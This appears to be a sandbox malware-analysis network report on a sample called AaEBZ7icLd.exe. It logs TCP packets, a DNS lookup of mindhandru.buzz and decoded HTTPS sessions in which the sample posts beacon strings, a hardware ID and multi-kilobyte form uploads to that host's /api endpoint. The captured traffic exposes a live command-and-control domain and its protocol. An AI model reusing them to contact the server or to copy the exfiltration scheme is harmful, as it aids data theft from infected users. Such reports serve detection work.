Dec 27, 2024 08:59:15.104055882 CET | 443 | 49714 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:16.606040955 CET | 443 | 49714 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:16.606177092 CET | 49714 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:16.607744932 CET | 49714 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:16.607755899 CET | 443 | 49714 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:16.607991934 CET | 443 | 49714 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:16.609462976 CET | 49714 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:16.609462976 CET | 49714 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:16.609491110 CET | 443 | 49714 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:17.506114006 CET | 443 | 49714 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:17.506217003 CET | 443 | 49714 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:17.506304026 CET | 49714 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:17.506520033 CET | 49714 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:17.506536007 CET | 443 | 49714 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:17.617815971 CET | 49716 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:17.617835045 CET | 443 | 49716 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:17.617909908 CET | 49716 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:17.618218899 CET | 49716 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:17.618228912 CET | 443 | 49716 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:19.060178995 CET | 443 | 49716 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:19.060275078 CET | 49716 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:19.061527967 CET | 49716 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:19.061542988 CET | 443 | 49716 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:19.061783075 CET | 443 | 49716 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:19.063260078 CET | 49716 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:19.063260078 CET | 49716 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:19.063306093 CET | 443 | 49716 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:19.063364029 CET | 49716 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:19.111335039 CET | 443 | 49716 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:20.137834072 CET | 443 | 49716 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:20.138128042 CET | 443 | 49716 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:20.138303995 CET | 49716 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:20.138523102 CET | 49716 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:20.138544083 CET | 443 | 49716 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:20.386065960 CET | 49722 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:20.386120081 CET | 443 | 49722 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:20.386210918 CET | 49722 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:20.386519909 CET | 49722 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:20.386543989 CET | 443 | 49722 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:21.643502951 CET | 443 | 49722 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:21.643604994 CET | 49722 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:21.644999027 CET | 49722 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:21.645005941 CET | 443 | 49722 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:21.645243883 CET | 443 | 49722 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:21.646604061 CET | 49722 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:21.646729946 CET | 49722 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:21.646756887 CET | 443 | 49722 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:21.646846056 CET | 49722 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:21.646853924 CET | 443 | 49722 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:22.720063925 CET | 443 | 49722 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:22.720181942 CET | 443 | 49722 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:22.720242023 CET | 49722 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:22.720406055 CET | 49722 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:22.720419884 CET | 443 | 49722 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:23.201103926 CET | 49728 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:23.201158047 CET | 443 | 49728 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:23.201231956 CET | 49728 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:23.201550007 CET | 49728 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:23.201564074 CET | 443 | 49728 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:24.460563898 CET | 443 | 49728 | 172.67.165.185 | 192.168.2.5
                                                                                                                Dec 27, 2024 08:59:24.460638046 CET49728443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:24.461981058 CET49728443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:24.461987019 CET44349728172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:24.462217093 CET44349728172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:24.463413954 CET49728443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:24.463510990 CET49728443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:24.463515997 CET44349728172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:25.256155014 CET44349728172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:25.256294966 CET44349728172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:25.256382942 CET49728443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:25.256455898 CET49728443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:25.256480932 CET44349728172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:25.785500050 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:25.785567045 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:25.785856962 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:25.786031008 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:25.786048889 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.045455933 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.045521975 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.046938896 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.046947002 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.047269106 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.061058998 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.061997890 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.062036037 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.062131882 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.062163115 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.062268972 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.062433958 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.062556982 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.062582970 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.062717915 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.062745094 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.062875032 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.062901020 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.062907934 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.062915087 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.063038111 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.063060999 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.063082933 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.063097000 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.063179970 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.063194990 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.063216925 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.063229084 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.063240051 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.063252926 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.063287020 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.063334942 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.084697008 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.084712029 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:29.495518923 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:29.495618105 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:29.495687962 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:29.495865107 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:29.495882988 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:29.530735016 CET49742443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:29.530792952 CET44349742172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:29.530900955 CET49742443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:29.531240940 CET49742443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:29.531255007 CET44349742172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:30.334772110 CET49742443192.168.2.5172.67.165.185
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 08:59:10.360528946 CET | 60874 | 53 | 192.168.2.5 | 1.1.1.1
Dec 27, 2024 08:59:10.499123096 CET | 53 | 60874 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 27, 2024 08:59:10.360528946 CET | 192.168.2.5 | 1.1.1.1 | 0xefa1 | Standard query (0) | mindhandru.buzz | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 27, 2024 08:59:10.499123096 CET | 1.1.1.1 | 192.168.2.5 | 0xefa1 | No error (0) | mindhandru.buzz | | 172.67.165.185 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:59:10.499123096 CET | 1.1.1.1 | 192.168.2.5 | 0xefa1 | No error (0) | mindhandru.buzz | | 104.21.11.101 | A (IP address) | IN (0x0001) | false
                                                                                                                • mindhandru.buzz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49711 | 172.67.165.185 | 443 | 5632 | C:\Users\user\Desktop\AaEBZ7icLd.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:59:11 UTC | 262 | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: mindhandru.buzz
2024-12-27 07:59:11 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-27 07:59:12 UTC | 1125 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Fri, 27 Dec 2024 07:59:12 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=b43c8s4i3im7gf0ou9v6jjlhlh; expires=Tue, 22 Apr 2025 01:45:51 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lVqGwrYf5E9fhoos4spQTpzgpXdAMCpHQf5mCi%2F6srpDrnmpjYkpja0n9z%2BISSlhSQL8zmmKOwdOm78py7q17EZpsnGXiLf0UIFsVkXajJ%2FxY190RI2dT%2BtHL8jNR4QDSz8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f87c5152ff7c411-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1578&rtt_var=603&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1796923&cwnd=224&unsent_bytes=0&cid=fb6b5ed258a89684&ts=773&x=0"
2024-12-27 07:59:12 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-27 07:59:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49713 | 172.67.165.185 | 443 | 5632 | C:\Users\user\Desktop\AaEBZ7icLd.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:59:13 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 47
                                                                                                                Host: mindhandru.buzz
2024-12-27 07:59:13 UTC | 47 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-27 07:59:14 UTC | 1123 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Fri, 27 Dec 2024 07:59:14 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=fkvp41nl32ncj7kl2qd3dfqei9; expires=Tue, 22 Apr 2025 01:45:53 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y560KMa%2BOzG8%2BXmQrIg4HrJ8HJIMwhZhQAUUN3N0k3F6x8qGY2eKuN2hhOKie0Ay3dSUBGPR0A955D0o00udIGVNGHn6KPQD6nUpwhQmUuLj8VfkHAl%2FxKauxN3mch0X8KU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f87c5219fb242c1-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1685&rtt_var=646&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=946&delivery_rate=1677197&cwnd=242&unsent_bytes=0&cid=a80aa37db30ea2dd&ts=762&x=0"
                                                                                                                Data Ascii: khTqz7MScTfxeRLWxmKVwjVwVveL/vu6muHZlrdKVTJaF+nLcxTl+HL5mdTCNxLOJiQXYhkrpe9a4dyWt0pbsl+W5I42lbGpIbtUxxXinZ3iYJEx2Cy6bNzmVRajn9G3mtOtjbHTriqnr4XDl2YGijbnmuKL6KXqxKZKgzFMROAKEr9Y4sYhfjU7EZKDI12CbyXXsN/pMD8a84qFcUxeI5hX6Yq3VKW7YbVCxwXihB3roJaymi1xr4MlmAdlW5W
                                                                                                                2024-12-27 07:59:14 UTC1369INData Raw: 45 31 77 46 2b 42 2b 74 44 78 43 56 51 4d 30 46 49 4a 70 61 70 59 77 6d 69 35 30 50 55 4e 6f 43 70 55 78 57 59 42 6c 6c 45 59 39 58 76 30 45 63 62 79 68 72 49 46 61 51 7a 45 52 6a 43 4e 6b 42 6e 73 54 4a 6e 74 73 51 65 48 66 31 69 78 62 6c 48 66 59 31 57 78 65 34 55 66 67 4b 71 65 75 67 73 63 43 39 73 49 62 38 76 54 44 35 45 38 39 49 65 68 4e 4d 35 7a 57 70 4d 70 47 5a 77 6d 47 4b 39 37 6b 78 2f 42 36 64 54 34 51 31 38 5a 79 51 38 4a 70 61 5a 61 77 32 36 31 78 2b 51 6b 76 6c 51 50 68 6d 64 50 79 58 35 4a 2f 58 57 4c 55 4d 61 79 2f 36 6f 4e 48 44 43 45 43 43 2f 62 32 52 54 78 62 4b 33 5a 39 44 32 52 4a 7a 32 4c 62 6b 44 59 65 45 2b 79 65 34 55 66 67 4b 71 65 75 41 73 63 43 39 73 49 62 38 76 54 44 35 45 38 39 49 65 68 4e 4d 35 7a 57 70 4d 70 47 5a 77 6d 47
                                                                                                                Data Ascii: E1wF+B+tDxCVQM0FIJpapYwmi50PUNoCpUxWYBllEY9Xv0EcbyhrIFaQzERjCNkBnsTJntsQeHf1ixblHfY1Wxe4UfgKqeugscC9sIb8vTD5E89IehNM5zWpMpGZwmGK97kx/B6dT4Q18ZyQ8JpaZaw261x+QkvlQPhmdPyX5J/XWLUMay/6oNHDCECC/b2RTxbK3Z9D2RJz2LbkDYeE+ye4UfgKqeuAscC9sIb8vTD5E89IehNM5zWpMpGZwmG
                                                                                                                2024-12-27 07:59:14 UTC1369INData Raw: 2f 67 66 7a 46 71 67 73 63 41 34 6f 51 64 35 71 4c 52 4d 6c 67 70 4a 76 30 4d 59 63 71 56 4d 56 6e 41 5a 59 6f 57 62 63 72 78 6c 43 42 70 73 44 6b 53 78 77 51 68 46 46 33 6a 63 45 4d 6c 79 48 6a 78 62 4e 7a 77 43 30 5a 6c 33 74 48 7a 58 35 62 2b 67 58 31 63 70 54 74 31 75 6b 48 62 51 4c 4f 58 69 4b 59 6b 56 50 36 55 59 37 46 39 44 75 44 4b 43 75 54 61 6b 48 41 62 78 6a 7a 65 39 4d 66 33 71 72 72 2b 45 4a 4d 44 49 6f 47 64 35 66 42 44 49 52 69 73 64 44 6a 4b 4d 78 74 41 49 49 70 58 6f 42 78 47 4b 74 37 6b 77 7a 49 71 74 53 71 48 52 78 49 78 45 55 32 6d 49 39 58 31 6e 32 6c 31 4f 55 6f 78 31 51 6b 71 48 74 47 33 6d 73 61 6a 44 62 50 53 5a 50 70 31 75 31 37 59 69 4c 59 54 79 65 59 77 33 6a 44 59 71 2f 70 7a 52 79 52 62 51 72 48 54 30 4c 59 61 78 6a 7a 65 39
                                                                                                                Data Ascii: /gfzFqgscA4oQd5qLRMlgpJv0MYcqVMVnAZYoWbcrxlCBpsDkSxwQhFF3jcEMlyHjxbNzwC0Zl3tHzX5b+gX1cpTt1ukHbQLOXiKYkVP6UY7F9DuDKCuTakHAbxjze9Mf3qrr+EJMDIoGd5fBDIRisdDjKMxtAIIpXoBxGKt7kwzIqtSqHRxIxEU2mI9X1n2l1OUox1QkqHtG3msajDbPSZPp1u17YiLYTyeYw3jDYq/pzRyRbQrHT0LYaxjze9


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.5  49714        172.67.165.185  443               5632  C:\Users\user\Desktop\AaEBZ7icLd.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:59:16 UTC | 281 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=2LF9ILW66AEACCQ6TM
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12835
    Host: mindhandru.buzz
2024-12-27 07:59:16 UTC | 12835 | OUT | Data Raw: 2d 2d 32 4c 46 39 49 4c 57 36 36 41 45 41 43 43 51 36 54 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 46 46 36 45 46 45 39 36 33 36 38 33 31 30 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 32 4c 46 39 49 4c 57 36 36 41 45 41 43 43 51 36 54 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 4c 46 39 49 4c 57 36 36 41 45 41 43 43 51 36 54 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f
    Data Ascii (line breaks restored from the CR/LF bytes above):
    --2LF9ILW66AEACCQ6TM
    Content-Disposition: form-data; name="hwid"

    18FF6EFE96368310BEBA0C6A975F1733
    --2LF9ILW66AEACCQ6TM
    Content-Disposition: form-data; name="pid"

    2
    --2LF9ILW66AEACCQ6TM
    Content-Disposition: form-data; name="lid"

    PsFKDg--pablo
2024-12-27 07:59:17 UTC | 1127 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Dec 2024 07:59:17 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=7cq1s1qbt4bgp2hfk586f4c0jk; expires=Tue, 22 Apr 2025 01:45:56 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nG79%2BuZZkzO1JMCa0Sk34agezlx7iOnPnkHYM3%2F%2BNq8AyOGBZlha5h9AkA4pj0daAn9AEa0ZnALDnSZEQb1GPLGH2tBy40XE4YWvKV3kq2m6Lg3s856FCPemz7f0PYpkBNc%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f87c531ef1543fa-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1732&min_rtt=1713&rtt_var=680&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13774&delivery_rate=1564844&cwnd=149&unsent_bytes=0&cid=70d9d2b44ce239de&ts=1149&x=0"
2024-12-27 07:59:17 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii (chunk size line, then chunk body):
    f
    ok 8.46.123.189
2024-12-27 07:59:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.5  49716        172.67.165.185  443               5632  C:\Users\user\Desktop\AaEBZ7icLd.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:59:19 UTC | 277 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=AGNW0CGYF99SV8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15053
    Host: mindhandru.buzz
2024-12-27 07:59:19 UTC | 15053 | OUT | Data Raw: 2d 2d 41 47 4e 57 30 43 47 59 46 39 39 53 56 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 46 46 36 45 46 45 39 36 33 36 38 33 31 30 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 41 47 4e 57 30 43 47 59 46 39 39 53 56 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 47 4e 57 30 43 47 59 46 39 39 53 56 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 41 47 4e 57 30 43 47 59
    Data Ascii (line breaks restored from the CR/LF bytes above; dump truncated by the report):
    --AGNW0CGYF99SV8
    Content-Disposition: form-data; name="hwid"

    18FF6EFE96368310BEBA0C6A975F1733
    --AGNW0CGYF99SV8
    Content-Disposition: form-data; name="pid"

    2
    --AGNW0CGYF99SV8
    Content-Disposition: form-data; name="lid"

    PsFKDg--pablo
    --AGNW0CGY
2024-12-27 07:59:20 UTC | 1133 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Dec 2024 07:59:19 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=rblk8pukl2ri7s7j923959l3nk; expires=Tue, 22 Apr 2025 01:45:58 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WrU11zksPpU%2BvH%2FcjDqTFL4spuYoYS13SDkXcbczcWkC85PFpltYUHZ%2FChW54rHDBaQ2cCRq%2BcAYmVaWoR%2FPg1yEhTFulAl1yUg3fcHQIlVjucb1N6N2GKvM05Ad%2BkxyBIc%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
